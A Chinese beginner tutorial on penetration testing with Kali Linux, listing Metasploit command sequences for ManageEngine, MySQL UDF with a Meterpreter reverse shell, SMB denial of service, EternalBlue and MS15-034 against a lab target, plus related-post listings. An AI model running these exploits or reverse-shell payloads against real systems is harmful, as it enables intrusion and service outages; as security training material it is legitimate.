您当前的位置:首页 > 电脑百科 > 安全防护 > 黑客技术

小白黑客是如何进行Kali Linux渗透测试的?

时间:2021-06-18 10:02:58  来源:  作者:Kali与编程

1、攻击windows服务器漏洞

用nmap对网段进行扫描nmap -sP 192.168. 在进行IP扫描

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

发现Windows服务器漏洞

步骤:

msfconsole---进入渗透模块

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

search manageengine-------搜索渗透模块

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

search reverse_http---------搜索http渗透模块

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

use
exploit/windows/http/manageeine_connectionid_write--------使用该渗透模块

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

set rhosts 192.168.

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

set rport 8022

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

set LpORT 8080

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

run -----------------设置攻击目标地址,攻击目标端口,回连的端口号:

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

2、MySQL数据库漏洞

nmap 192.168.-----扫描端口漏洞

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

步骤:

msfconsole-------进入渗透模式

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

search mysql-------扫描数据库渗透版本

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

use
exploit/multi/mysql/mysql_udf_payload----------使用该渗透版本进行渗透

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

show options

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

set rhosts 192.168.--------设置攻击端口号

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

set payload
windows/x64/meterpreter/reverse_tcp--------选择该渗透方式进行攻击

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

run

3、拒绝服务攻击漏洞:

使用nmap 192.168. 对端口号进行扫描发现漏洞

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

步骤:

msfconsole-------进入渗透模式

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

search dos/smb/smb-------搜索渗透版本

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

use
auxiliary/dos/smb/smb_loris-------使用该渗透版本进行攻击

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

show options--------

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

set rhosts 192.168.--------设置攻击端口号

run-----渗透

4.永恒之蓝漏洞复现

漏洞描述:

Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

影响版本:

目前已知受影响的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

复现环境:

攻击机:Kali2020.3(IP:192.168.88.143)

靶机:Metasploitable3Win2k8 (IP:192.168.88.140)

复现过程:

  1. 用nmap执行C段扫描
Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

2、打开MSF

在终端输入如下命令打开MSF终端:

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

搜索ms17_010模块

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

这里可以得到几个工具,其中
auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,
exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。

执行扫描模块

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

执行ms17_010攻击模块

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 


Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

5.MySQL弱密码登录:

1、在kali上执行mysql –h 192.168.26.123 –u root

2、登录成功,进入MySQL系统

3、测试效果:

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

6.http(ms15_034漏洞)

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

进入msf模块

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 


Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 


Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

查看要设置的东西show options

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

设置攻击ip

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

攻击前

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 


Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

攻击后,我的是蓝屏1秒后,跳转到立即重启界面

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

ssh测试

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

开启端口转发

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

查看情况

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 

在kali上尝试连接(rdesktop IP)

Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 


Kali与编程:小白黑客是如何进行Kali Linux渗透测试的?

 



专栏
1个月掌握Kali渗透与黑客编程
作者:Kali与编程
188币
269人已购
查看


Tags:渗透测试   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
简介在sqlmap基础上增加了目录扫描、hash爆破等功能运行环境 linux 在云服务器上还是蛮不错的项目连接如下https://github.com/s0md3v/sqlmat usage: sqlmate [-h] [--dor...【详细内容】
2021-11-10  Tags: 渗透测试  点击:(44)  评论:(0)  加入收藏
一:信息收集阶段因为目标是学校,一般会去考虑收集学号,教工号。因为有的登陆点需要此类信息,且密码存在规律性(身份证后六位,123456)。目标域名xxx.com【查看资料】开始的时候,我是...【详细内容】
2021-10-27  Tags: 渗透测试  点击:(46)  评论:(0)  加入收藏
一、背景介绍Pikachu是一个带有各种漏洞的Web应用系统,这个系统是使用PHP搭建的,需要PHP环境和Mysql数据库支持。我们可以利用phpstudy在本地搭建这个渗透测试平台,如果你是一...【详细内容】
2021-10-09  Tags: 渗透测试  点击:(52)  评论:(0)  加入收藏
一、准备环境Burpsuite、夜神模拟器二、步骤运行burpsuite,打开代理后,访问 http://burp/ 下载CA证书点击右上角位置下载CA证书将下载的CA证书导入到浏览器中,打开浏览器选择设...【详细内容】
2021-10-08  Tags: 渗透测试  点击:(66)  评论:(0)  加入收藏
0x01前言在渗透测试过程中,开发不可能每一次都将结果输出到页面上,也就是漏洞无回显的情况,那么在这种情况下,我们可以通过dnslog判断漏洞存在,或者通过起一个python的http服务来...【详细内容】
2021-08-12  Tags: 渗透测试  点击:(68)  评论:(0)  加入收藏
使用 Kali Linux 和其他开源工具来发现系统中的安全漏洞和弱点。众多被广泛报道的大型消费企业入侵事件凸显了系统安全管理的重要性。幸运的是,有许多不同的应用程序可以帮助...【详细内容】
2021-08-06  Tags: 渗透测试  点击:(60)  评论:(0)  加入收藏
一、网络配置1、首先保证所有的设备(kali虚拟机和安卓手机)都连接到同一个局域网(Wi-Fi)下。在现实生活中,黑客通常找寻免费的公共Wi-Fi,来保证有足够多的安卓手机供其渗透。所以...【详细内容】
2021-08-02  Tags: 渗透测试  点击:(215)  评论:(0)  加入收藏
一、渗透测试常见漏洞 1、敏感信息泄露由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出差导致敏感信息泄露。2、SQL注入SQL注入漏洞产生的原因是网站应用程...【详细内容】
2021-07-29  Tags: 渗透测试  点击:(130)  评论:(0)  加入收藏
前言下午闲来无事,测试自己的站玩玩,也算是一次比较完备地漏洞挖掘。信息搜集在fofa上找到一个后台的站。 一个普通的后台,弱口令,sql注入没打进去。从错误路由中得知框架是tp的...【详细内容】
2021-07-19  Tags: 渗透测试  点击:(107)  评论:(0)  加入收藏
0x00:寻找漏洞点某天闲着无聊用谷歌语法inurl:aspx?id=找到一个国外的某个站点。功能点比较简单只有一个User ID: 0x01:检测功能点由于只有搜索框我们先来一个单引号看他是...【详细内容】
2021-07-15  Tags: 渗透测试  点击:(85)  评论:(0)  加入收藏
▌简易百科推荐
一、背景介绍作为一名渗透测试工作人员(或者小白),在我们的日常工作或者学习中,我们不可能时时刻刻将自己的个人电脑(安装好Kali Linux的个人主机)带在身边,当我们没有带自己的个人...【详细内容】
2021-12-27  Kali与编程    Tags:Kali Linux   点击:(2)  评论:(0)  加入收藏
我们都知道公司网络中开放的端口越多,遭受网络攻击的可能性就越大,就越容易发生数据泄露事件。 在这篇文章中,我们将讨论与开放端口相关的网络安全隐患。 网络中的端口 据统计...【详细内容】
2021-12-10  诺必达云服务    Tags:端口扫描   点击:(33)  评论:(0)  加入收藏
一、背景介绍DirBuster是用来探测web服务器上的目录和隐藏文件的。因为DirBuster是采用java编写的,所以运行前要安装上java的环境。 来看一下基本的使用: ①:TargetURL下输入要...【详细内容】
2021-12-07  Kali与编程    Tags:Dirbuster   点击:(27)  评论:(0)  加入收藏
#本文仅用于网络安全研究学习任何未经授权的入侵都是违法行为dir 浏览 创建文件 echo 文件内容 > 文件名字.扩展名 浏览文件内容 type 文件名 分页浏...【详细内容】
2021-12-07  WHOAMI    Tags:黑客   点击:(22)  评论:(0)  加入收藏
上一节中我们学了如何实现ARP断网攻击,本节中我们将利用ARP欺骗的原理实现截取目标计算机图片流量,内容包括:ü如何开启ip转发ü怎样截取受害机图片流量 一、开启ip转...【详细内容】
2021-11-23  Kali与编程    Tags:黑客   点击:(22)  评论:(0)  加入收藏
一、背景介绍大家在Linux的日常使用中都晓得如何通过命令行去配置Linux的端口开放规则,但是大家知道如何配置Windows入站出站规则吗?有哪些常见的危险端口呢?如何解决上述问题...【详细内容】
2021-11-15  Kali与编程    Tags:端口   点击:(38)  评论:(0)  加入收藏
1.背景介绍几乎每一个玩渗透的人都会接触到metasploit framework,简称msf。这是一个渗透测试框架,用ruby语言编写的,该框架集成了很多可用的exploit,比如著名的ms08_067等。你可...【详细内容】
2021-11-15  Kali与编程    Tags:服务扫描   点击:(37)  评论:(0)  加入收藏
在前面的课程中,我们学习了ARP攻击的理论和实践知识,知道了怎么进行攻击,这节中我们将学习如何进行防御,内容包括:ü借助第三方软件防御(360安全卫士,腾讯管家等)ü使用arp...【详细内容】
2021-11-13  Kali与编程    Tags:白帽   点击:(32)  评论:(0)  加入收藏
简介在sqlmap基础上增加了目录扫描、hash爆破等功能运行环境 linux 在云服务器上还是蛮不错的项目连接如下https://github.com/s0md3v/sqlmat usage: sqlmate [-h] [--dor...【详细内容】
2021-11-10  暗网视界    Tags:sqlmate   点击:(44)  评论:(0)  加入收藏
一、背景介绍在网上冲浪少不了用到搜索引擎,而很多朋友都习惯把Google视为第一个选择对象。当然Google无论在搜索速度还是结果关联性方面都是十分优秀的。但百度(http://www.b...【详细内容】
2021-11-05  Kali与编程    Tags:白帽黑客   点击:(31)  评论:(0)  加入收藏
最新更新
栏目热门
栏目头条